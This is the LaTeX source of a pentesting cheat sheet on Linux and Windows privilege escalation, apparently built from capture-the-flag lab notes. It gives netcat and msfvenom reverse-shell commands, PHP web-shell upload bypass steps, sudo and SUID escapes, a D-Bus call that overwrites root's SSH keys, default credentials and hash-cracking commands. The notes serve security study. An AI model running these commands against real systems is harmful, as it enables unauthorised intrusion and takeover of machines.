\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{blacklist\_} \pdfinfo{ /Title (linux-windows-privilege-escalation.pdf) /Creator (Cheatography) /Author (blacklist\_) /Subject (Linux | Windows Privilege Escalation Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{292421} \definecolor{LightBackground}{HTML}{F8F8F8} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Linux | Windows Privilege Escalation Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{blacklist\_} via \textcolor{DarkBackground}{\uline{cheatography.com/121658/cs/22362/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}blacklist\_ \\ \uline{cheatography.com/blacklist} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 27th February, 2021.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{2} \begin{tabularx}{8.4cm}{x{2.16 cm} x{5.84 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{HTTP Status Codes}} \tn % Row 0 \SetRowColor{LightBackground} Code \seqsplit{(Gobuster)} & Status \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} 2XX & \{\{fa-bolt\}\} Success \{\{nl\}\}\{\{fa-bolt\}\} This class of status codes indicates the action requested by the client was received, understood and accepted. \tn % Row Count 8 (+ 6) % Row 2 \SetRowColor{LightBackground} 3XX & \{\{fa-bolt\}\}Redirection \{\{nl\}\}\{\{fa-bolt\}\} This class of status code indicates the client must take additional action to complete the request. \tn % Row Count 13 (+ 5) % Row 3 \SetRowColor{white} 4XX & \{\{fa-bolt\}\} Client Error \{\{nl\}\}\{\{fa-bolt\}\} This class of status code is intended for situations in which the error seems to have been caused by the client. \tn % Row Count 19 (+ 6) % Row 4 \SetRowColor{LightBackground} 5xx & \{\{fa-bolt\}\} Server Error \tn % Row Count 20 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{https://www.restapitutorial.com/httpstatuscodes.html}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} View Source Code & Read it \seqsplit{(enumeration/directory)} \{\{fa-bolt\}\{\{nl\}\} Read hints Carefully and use find and locate command \tn % Row Count 7 (+ 6) % Row 2 \SetRowColor{LightBackground} Gobuster & Dirb buster \tn % Row Count 8 (+ 1) % Row 3 \SetRowColor{white} Nmap Scan & -A (aggressive) -p- (all ports) \tn % Row Count 10 (+ 2) % Row 4 \SetRowColor{LightBackground} Steganography & \seqsplit{https://0xrick.github.io/lists/stego/} \tn % Row Count 12 (+ 2) % Row 5 \SetRowColor{white} Ftp & Penetration testing of ftp port. \{\{nl\}\} \{\{fa-bolt\}\} \{\{nl\}\} It can be brute forced using hydra. \{\{fa-bolt\}\}\{\{nl\}\} ftp \textless{}ipaddr\textgreater{} to connect and \textless{}get\textgreater{} files. \tn % Row Count 20 (+ 8) % Row 6 \SetRowColor{LightBackground} Think like an hacker & What can i do from here \{\{nl\}\} \{\{fa-bolt\}\}Where can i look (any hints given) \tn % Row Count 24 (+ 4) % Row 7 \SetRowColor{white} Common Username/Password & admin:admin admin:admin123 admin:password root:password root:root and admin:fileserver \tn % Row Count 29 (+ 5) % Row 8 \SetRowColor{LightBackground} Web shell & \{\{fa-bolt\}\} Provides us to enable with remote administration on the target server \{\{nl\}\}\{\{fa-bolt\}\} We can add or modify some data (deface it) as a webadmin. So after we get the web site admin access, our aim is to get web server access. \tn % Row Count 41 (+ 12) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 9 \SetRowColor{LightBackground} Information Gathering & \{\{fa-bolt\}\} Search the website if it has blog post with names that can be used. Try to gather information and think how it can be used \{\{nl\}\} \{\{fa-bolt\}\} Try to think if you require a email what info can be used to fetch a name or format on how email is being used such as using \seqsplit{initals@domain\_name} \tn % Row Count 15 (+ 15) % Row 10 \SetRowColor{white} Directory Enumeration Wordlists & \{\{fa-bolt\}\} Dirbuster medium \{\{fa-bolt\}\} Dirb common \{\{fa-bolt\}\} rockyou \tn % Row Count 19 (+ 4) % Row 11 \SetRowColor{LightBackground} Steghide and Binwalk & Binwalk is used on png and Steghide is used on jpg \{\{nl\}\} A png image can be used to hide binary files like zip whereas jpg image can be used to hide a text file \tn % Row Count 28 (+ 9) % Row 12 \SetRowColor{white} Identify hash & hashid 'hash' and ciphey tool \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 13 \SetRowColor{LightBackground} Terminate hashcat session & `rm -rf \textasciitilde{}/.hashcat/sessions/hashcat.pid` \tn % Row Count 2 (+ 2) % Row 14 \SetRowColor{white} Nmap script scans & nmap -sV -A -{}-script vuln \textless{}ip\textgreater{} \tn % Row Count 4 (+ 2) % Row 15 \SetRowColor{LightBackground} JWT CRACK & hashcat -a 0 -m 16500 crack.txt /rockyou \tn % Row Count 6 (+ 2) % Row 16 \SetRowColor{white} HTTP running & \{\{fa-bolt\}\} dirb \{\{fa-bolt\}\} try HTTPS//\textless{}ip\textgreater{} \{\{fa-bolt\}\} robots.txt \{\{fa-bolt\}\} Page source \tn % Row Count 11 (+ 5) % Row 17 \SetRowColor{LightBackground} Wordpress & \{\{fa-bolt\}\} \seqsplit{https://www.hackingarticles.in/wpscanwordpress-pentesting-framework/} \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://blog.wpscan.org/assets/posts/wpscan-posters/WPScan\_CLI\_Cheat\_Sheet.pdf} \tn % Row Count 22 (+ 11) % Row 18 \SetRowColor{white} Wordpress - get reverse shell & \{\{fa-bolt\}\} Username enumeration \{\{fa-bolt\}\} Brute force Password \{\{fa-bolt\}\} Login and upload shell to get session \{\{nl\}\}\{\{fa-bolt\}\} To upload PHP shell either upload it as a PLUGIN or Edit Theme, exploitDB - PHP plugin , MSF - PHP/reverse\_tcp and PHP reverse shell can be uploaded \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://www.hackingarticles.in/wordpress-reverse-shell/} \tn % Row Count 40 (+ 18) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 19 \SetRowColor{LightBackground} File Upload Bypass \& Pentest Monkey Shell & \{\{fa-bolt\}\} Intercept request \textgreater{} play with it and check response is highly important \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://github.com/strawp/web-shells"\}\}Collection of Web-Shells\{\{/link\}\}\{\{nl\}\}\{\{fa-bolt\}\} Guides - Hacktricks bypass file upload \& Hacker's Grimoire Book \{\{nl\}\} \{\{fa-bolt\}\} We can use hacktricks, first try out every single extensions and then try double extensions. Or use Burp Suite to bruteforce \tn % Row Count 21 (+ 21) % Row 20 \SetRowColor{white} Bypass File Upload & \{\{fa-bolt\}\} Download PHP pentest monkey rev shell \{\{nl\}\}\{\{fa-bolt\}\} rev shell with GIF89a on top \{\{nl\}\}\{\{fa-bolt\}\} Now change extension \{\{nl\}\}\{\{fa-bolt\}\} Upload it but wont execute \{\{nl\}\}\{\{fa-bolt\}\} Now upload again and intercept \{\{nl\}\}\{\{fa-bolt\}\} Intercept through Burp \{\{nl\}\}\{\{fa-bolt\}\} Edit the request and change that file to .gif.php \{\{nl\}\}\{\{fa-bolt\}\} Done just execute the shell through PATH \{\{nl\}\}\{\{fa-bolt\}\} Use nc to capture the connection \tn % Row Count 44 (+ 23) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 21 \SetRowColor{LightBackground} Spot DBus in SUID files & \{\{fa-bolt\}\} Execute this command to replace replace current user .ssh private ket to root .ssh private key so we can login in ssh as root \{\{nl\}\}\{\{fa-bolt\}\} gdbus call -{}-system -{}-dest \seqsplit{com.ubuntu.USBCreator} -{}-object-path \seqsplit{/com/ubuntu/USBCreator} -{}-method \seqsplit{com.ubuntu.USBCreator.Image} \seqsplit{/home/nadav/authorized\_keys} \seqsplit{/root/.ssh/authorized\_keys} true \{\{nl\}\}\{\{fa-bolt\}\} If we get ( ) as reply, it executed system call \tn % Row Count 21 (+ 21) % Row 22 \SetRowColor{white} DBus & \{\{fa-bolt\}\} dbus is message bus system for usb controller \{\{nl\}\} \{\{fa-bolt\}\} basically send message of buses from one bus to another \{\{nl\}\}\{\{fa-bolt\}\} If current user has SUID on DBUS it means that they have executable rights over that command \tn % Row Count 34 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 23 \SetRowColor{LightBackground} Bruteforce vhosts / subdomains using FFUF & \{\{fa-bolt\}\} ffuf -w \seqsplit{SecLists/Discovery/DNS/subdomains-top1million-5000}.txt -u \seqsplit{http://undiscovered.thm/} -H "Host: \seqsplit{FUZZ.undiscovered.thm"} -fc 302 \{\{nl\}\} ffuf -w \seqsplit{/usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000}.txt -u \seqsplit{http://delivery.htb/} -H "Host: FUZZ.delivery.htb" -fw 486 \{\{nl\}\}\{\{fa-bolt\}\} Wc is to filter with word. To learn more visit \{\{link="https://medium.com/quiknapp/fuzz-faster-with-ffuf-c18c031fc480"\}\} FFUF Fuzzing Filtering\{\{/link\}\} \tn % Row Count 24 (+ 24) % Row 24 \SetRowColor{white} Bruteforcing directory along with extensions & gobuster dir -u \textless{}ip\textgreater{} -w \seqsplit{/usr/share/wordlists/dirbuster/directory-list-2}.3-medium.txt -t 42 -x .bak,.php \tn % Row Count 30 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (cont)}} \tn % Row 25 \SetRowColor{LightBackground} Fuzzing vs Bruteforce & \{\{fa-bolt\}\} Brute forcing is an attack method of just trying all passwords, in a password brute force anyway. Fuzzing is a method of sending malformed or abnormal data to a service in an attempt to get it to misbehave in some way, which could lead to the discovery of vulnerabilities from denial of service, buffer overflows or remote code execution etc. FUZZ can be done for subdomains too, and sending payloads to find LFI or RCE etc.. \tn % Row Count 22 (+ 22) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Linux Escalation Techniques -\textgreater{} \seqsplit{http://xiphiasilver.net/2018/04/26/annotation-abusing-sudo-linux-privilege-escalation/\#disqus\_thread} \newline \newline Web enumeration -\textgreater{} \seqsplit{https://berzerk0.github.io/GitPage/CTF-Writeups/Optimum-HTB.html}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows)}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Nmap -\textgreater{} Service Enumeration & The services running helps us in identifying our next steps \{\{nl\}\} \{\{fa-bolt\}\} Kerberos was running on port 88 so we could launch a Kerberos pre authentication attack \{\{nl\}\} \{\{fa-bolt\}\} If many services are running try enum4linux \{\{nl\}\} \{\{fa-bolt\}\} Website upload shell and access it \tn % Row Count 16 (+ 15) % Row 2 \SetRowColor{LightBackground} nmap -sV -{}-script=nfs-showmount \textless{}target\textgreater{} & \{\{fa-bolt\}\} Nmap script scan and Nmap scan \{\{fa-bolt\}\} 2049 (port no) \tn % Row Count 20 (+ 4) % Row 3 \SetRowColor{white} NFS (mount the drive to access it) & \{\{fa-bolt\}\} Network File System permits a user on a client machine to mount the shared files or directories over a network. \{\{nl\}\} \{\{fa-bolt\}\} showmount -e \textless{}target\textgreater{} \tn % Row Count 29 (+ 9) % Row 4 \SetRowColor{LightBackground} Mount the content of shared folder -t (type) nfs/iso & mount -t nfs ip:/drive\_name /mnt/folder\_name \{\{nl\}\} \{\{fa-bolt\}\} There is a possibility to access the root folder by :/ and then navigate to other folder such as root \{\{nl\}\} \{\{fa-bolt\}\} There is a way to detach a busy device immediately \#umount -l and then delete the contents \tn % Row Count 43 (+ 14) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Google where does CMS (umbraco) store credentials & \{\{fa-bolt\}\} Appdata/.sdf file extension normally contain standard database files that store data in a structured file format. \{\{nl\}\} \{\{fa-bolt\}\} cat Umbraco.sdf | grep admin \tn % Row Count 9 (+ 9) % Row 6 \SetRowColor{white} Hashcat to crack password hash & \{\{fa-bolt\}\} hashcat -a 0 -m 100 crack.hash \seqsplit{/usr/share/wordlists/rockyou}.txt \tn % Row Count 13 (+ 4) % Row 7 \SetRowColor{LightBackground} Whenever you get interface try to find upload panel & \{\{fa-bolt\}\} Upload reverse shell then browse the directory to execute it on the remote machine to get a reverse shell \tn % Row Count 19 (+ 6) % Row 8 \SetRowColor{white} Windows reverse shell payload & \{\{fa-bolt\}\} msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=10.10.14.89 LPORT=4455 -f exe \textgreater{} blacklist.exe \{\{nl\}\} \{\{fa-bolt\}\} Upload it \tn % Row Count 26 (+ 7) % Row 9 \SetRowColor{LightBackground} C:/Inetpub (cve browse to access payoad) 'ls C:/' & \{\{fa-bolt\}\} Inetpub is the folder on a computer that is the default folder for Microsoft Internet Information Services (IIS). The website content and web apps are stored in the inetpub folder β€” which keeps it organized and secure. \tn % Row Count 38 (+ 12) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 10 \SetRowColor{LightBackground} Access the payload & \{\{fa-bolt\}\} python exploit.py -u admin@htb.local -p baconandcheese -i \seqsplit{'http://10.10.10.180'} -c powershell.exe -a \seqsplit{'C:/inetpub/wwwroot/media/1034/blacklist}.exe' \tn % Row Count 8 (+ 8) % Row 11 \SetRowColor{white} Listen for connection & \{\{fa-bolt\}\} use \seqsplit{exploit/multi/handler} \{\{nl\}\} \{\{fa-bolt\}\} set payload \seqsplit{payload/windows/x64/shell\_reverse\_tcp} \tn % Row Count 14 (+ 6) % Row 12 \SetRowColor{LightBackground} Upload Winpeas and access using CVE & \{\{fa-bolt\}\} Privilege Escalation Awesome Scripts \tn % Row Count 17 (+ 3) % Row 13 \SetRowColor{white} winPEAS & \{\{fa-bolt\}\} Application area we can see Teamviewer and check it using shell \{\{nl\}\} \{\{fa-bolt\}\} Use metasploit to gain access to credentials \{\{nl\}\} \{\{fa-bolt\}\} s run \seqsplit{post/windows/gather/credentials/teamviewer\_passwords} \tn % Row Count 28 (+ 11) % Row 14 \SetRowColor{LightBackground} Evil-Winrm : Winrm Pentesting Framework & \{\{fa-bolt\}\} PS Remote shell hacking tool named as "Evil-Winrm". So we can say that it could be used in a post-exploitation hacking/pentesting phase. \{\{nl\}\} \{\{fa-bolt\}\} The purpose of this program is to provide nice and easy-to-use features for hacking. \tn % Row Count 41 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 15 \SetRowColor{LightBackground} Evil Winrm & evil-winrm -u Administrator -p '!R3m0te!' -i '10.10.10.180' \tn % Row Count 3 (+ 3) % Row 16 \SetRowColor{white} Enum4linux & \{\{fa-bolt\}\} Enum4linux is an enumeration tool capable of detecting and extracting data from Windows and Linux operating systems, including those that are Samba (SMB) hosts on a network. Enum4linux is capable of discovering the following: Password policies on a target, The operating system of a remote target, Shares on a device (drives and folders), Domain and group membership, User listings \tn % Row Count 23 (+ 20) % Row 17 \SetRowColor{LightBackground} GetNPUUser (impacket script) & \{\{fa-bolt\}\} getnpuusers.py \textless{}domain\_name\textgreater{}/ -dc-ip \textless{}ip\textgreater{} \{\{nl\}\} \{\{fa-bolt\}\} getNPUusers.py - Get users password hashes, Supported in Kerberos protocol, Disable Kerberos pre-auth it becomes vulnerable, username and password are optional, Use this script to identify vulnerable accounts \tn % Row Count 38 (+ 15) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 18 \SetRowColor{LightBackground} Domain Controller , Active Directory & \{\{fa-bolt\}\} A Windows Domain allows management of large computer networks \{\{nl\}\} \{\{fa-bolt\}\} They use a Windows server called a DC (domain controller) \{\{nl\}\} \{\{fa-bolt\}\} A DC is any server that has Active Directory domain services role \{\{nl\}\} \{\{fa-bolt\}\} DC respond to authentication requests across the domain \{\{nl\}\} \{\{fa-bolt\}\} DCs have the tool AD (active directory) and GP (group policy) \{\{nl\}\} \{\{fa-bolt\}\} AD contains objects and OUs (Organizational Units) \{\{nl\}\} \{\{fa-bolt\}\} GP contains GPOs (Group Policy objects) that manage settings for AD objects \tn % Row Count 28 (+ 28) % Row 19 \SetRowColor{white} Kerberos Cheatsheet & \seqsplit{https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a} \tn % Row Count 32 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cyber Kill Chain (Windows) (cont)}} \tn % Row 20 \SetRowColor{LightBackground} SMB (netbios-sn) & SMB ports are open. We need to do the usual tasks: check for anonymous login, list shares and check permissions on shares. \{\{nl\}\} \{\{fa-bolt\}\} \tn % Row Count 8 (+ 8) % Row 21 \SetRowColor{white} SMB enumeration & smbclient -L ip and access smbclient \seqsplit{//192.168.1.108/share\_name} \tn % Row Count 12 (+ 4) % Row 22 \SetRowColor{LightBackground} Notes in Kali & Windows Priv. Esc. \tn % Row Count 13 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite} \newline \newline https://book.hacktricks.xyz/windows/active-directory-methodology} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Linux privilege cheatsheet & \{\{fa-bolt\}\} \seqsplit{https://guide.offsecnewbie.com/privilege-escalation/linux-pe\#cron-jobs} \{\{nl\}\}\{\{fa-bolt\}\} Hack tricks \{\{nl\}\}\{\{fa-bolt\}\} Hacking articles \tn % Row Count 9 (+ 8) % Row 2 \SetRowColor{LightBackground} OSCP Cheatsheet & \seqsplit{https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html} \{\{nl\}\} \{\{nl\}\} \seqsplit{https://vulp3cula.gitbook.io/hackers-grimoire/} \tn % Row Count 16 (+ 7) % Row 3 \SetRowColor{white} Linpeas, Linenum, Linux exploit suggestor & \{\{fa-bolt\}\} Linpeas - Hacktricks checklist \{\{nl\}\} \{\{fa-bolt\}\} SUID command - find / -perm -u=s -type f 2\textgreater{}/dev/null \{\{nl\}\} \{\{fa-bolt\}\} Sudo -l \{\{nl\}\} \{\{fa-bolt\}\} Cron jobs cat /etc/crontab \tn % Row Count 26 (+ 10) % Row 4 \SetRowColor{LightBackground} Netcat & nc -e /bin/sh \textless{}ipadd\textgreater{} \textless{}port\textgreater{} (target) \tn % Row Count 28 (+ 2) % Row 5 \SetRowColor{white} & nc -lvp \textless{}port\textgreater{} (host) \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 6 \SetRowColor{LightBackground} msfconsole | Cheatsheet & Power up metasploit \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/"\}\} Metasploit Cheatsheet\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit"\}\} Github Reverse shell msfconsole\{\{/link\}\} \tn % Row Count 16 (+ 16) % Row 7 \SetRowColor{white} use exploit/\textless{}path\textgreater{} & specify exploit to use \tn % Row Count 18 (+ 2) % Row 8 \SetRowColor{LightBackground} show options & set the specific options \tn % Row Count 20 (+ 2) % Row 9 \SetRowColor{white} show target (set target no) & set the specific target like power shell, PHP, python \tn % Row Count 23 (+ 3) % Row 10 \SetRowColor{LightBackground} connect to rdp service using rdp client \{\{nl\}\} Windows & 3389:RDP\{\{nl\}\}\{\{fa-bolt\}\}start Remmina to access then enter ip address then enter username,domain and password \tn % Row Count 29 (+ 6) % Row 11 \SetRowColor{white} \{\{fa-linux\}\} Linux Privilege Escalation & \{\{fa-linux\}\} \{\{fa-linux\}\} \{\{fa-linux\}\} \{\{fa-linux\}\} \tn % Row Count 32 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 12 \SetRowColor{LightBackground} \{\{fa-bolt\}\} SUID binary & \{\{fa-linux\}\} find / -perm -u=s -type f 2\textgreater{}/dev/null \{\{nl\}\}\{\{fa-linux\}\} If you want to escalate privilege to another user search files that user owns there might be a cronjob that executes his file and we can place reverse shell \{\{nl\}\}\{\{fa-linux\}\} find / -type d -group \textless{}user\_name\textgreater{} 2\textgreater{}/dev/null/ \tn % Row Count 15 (+ 15) % Row 13 \SetRowColor{white} \{\{fa-bolt\}\} CronJobs & \{\{fa-linux\}\} Trasnfer pspy64 through python server to find cronjobs \tn % Row Count 19 (+ 4) % Row 14 \SetRowColor{LightBackground} \{\{fa-bolt\}\} Sudo -l & \{\{fa-linux\}\} It show you what exact command you are authorized to use \tn % Row Count 23 (+ 4) % Row 15 \SetRowColor{white} \{\{fa-bolt\}\} Suid binary Automation Script & \{\{fa-linux\}\} SUID3NUM.py \{\{fa-linux\}\} Custom binary can be opened by reversing them using Ghidra \tn % Row Count 28 (+ 5) % Row 16 \SetRowColor{LightBackground} Add machine IP to /etc/hosts & \{\{fa-bolt\}\} echo 10.10.194.183 spookysec.local \textgreater{}\textgreater{} /etc/hosts \tn % Row Count 31 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 17 \SetRowColor{LightBackground} Cron Jobs (time-based job scheduler) & \{\{fa-bolt\}\} Mostly we try to add our reverse shell into the file and CRON jobs executes the files and we get the reverse shell \{\{nl\}\} \{\{fa-bolt\}\} We can even try to change etc/hosts if the cron is calling out to that IP we can change it and open a HTTP server on out machine and let him execute the script with our own reverse shell \tn % Row Count 17 (+ 17) % Row 18 \SetRowColor{white} Exploiting sudo -l & \{\{fa-bolt\}\} commands - /var/www/gdb as www-data \{\{nl\}\} \{\{fa-bolt\}\} escalate privilege to a user thirtytwo then \{\{nl\}\} \{\{fa-bolt\}\} use GTFO \{\{fa-bolt\}\} sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit \tn % Row Count 28 (+ 11) % Row 19 \SetRowColor{LightBackground} Exploiting sudo -l & \{\{fa-bolt\}\} (d4rckh) No paaswd: /usr/bit/git \{\{nl\}\}\{\{fa-bolt\}\} We have a user who can exec commands on that path \{\{nl\}\}\{\{fa-bolt\}\} execute command to escalate \{\{nl\}\}\{\{fa-bolt\}\} sudo -u d4rckh /usr/bin/git -p help config \{\{nl\}\}\{\{fa-bolt\}\} !/bin/sh \tn % Row Count 41 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 